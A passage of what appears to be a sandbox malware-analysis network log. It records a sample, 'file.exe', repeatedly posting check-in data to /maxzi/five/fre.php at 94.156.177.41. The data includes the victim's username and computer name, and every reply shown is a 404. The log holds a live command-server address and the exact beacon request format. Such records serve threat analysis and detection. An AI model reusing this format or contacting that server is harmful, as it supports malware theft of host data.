                                                                          Nov 22, 2024 17:38:30.844446898 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:32.251027107 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:32 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.44974394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:32.538633108 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:32.663837910 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:33.940777063 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:33 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.44974594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:34.211275101 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:34.331046104 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:35.739247084 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:35 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.44974894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:36.009876966 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:36.394360065 CET393OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:36.401062012 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:37.721430063 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:37 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.44974994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:37.991627932 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:38.111285925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:39.565046072 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:39 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.44975194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:39.828217983 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:39.948024988 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:41.267765045 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:41 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.44975394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:41.537769079 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:41.659081936 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:43.017709017 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:42 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.44975494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:43.293705940 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:43.413429976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:44.821378946 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:44 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.44975594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:45.079622030 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:45.199702024 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:46.587224960 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:46 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.44975694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:46.848512888 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:46.970644951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:48.298242092 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:48 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.44975794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:48.569140911 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:48.693876982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:50.103084087 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:49 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.44975894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:50.374321938 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:50.493984938 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:51.915977001 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:51 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.44975994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:52.189835072 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:52.309427023 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:53.760936022 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:53 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.44976094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:54.037755966 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:54.159921885 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:55.610198021 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:55 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.44976294.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:55.886729002 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:56.007118940 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:57.457268953 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:57 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.44976894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:57.727844954 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:57.847692966 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:38:59.302567005 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:38:59 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.44976994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:38:59.610678911 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:38:59.730254889 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:01.010632992 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:00 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.44977594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:01.271894932 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:01.391644955 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:02.801037073 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.44978194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:03.067959070 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:03.187494993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:04.480725050 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:04 GMT
                                                                          Content-Type: text/html; charset=utf-8
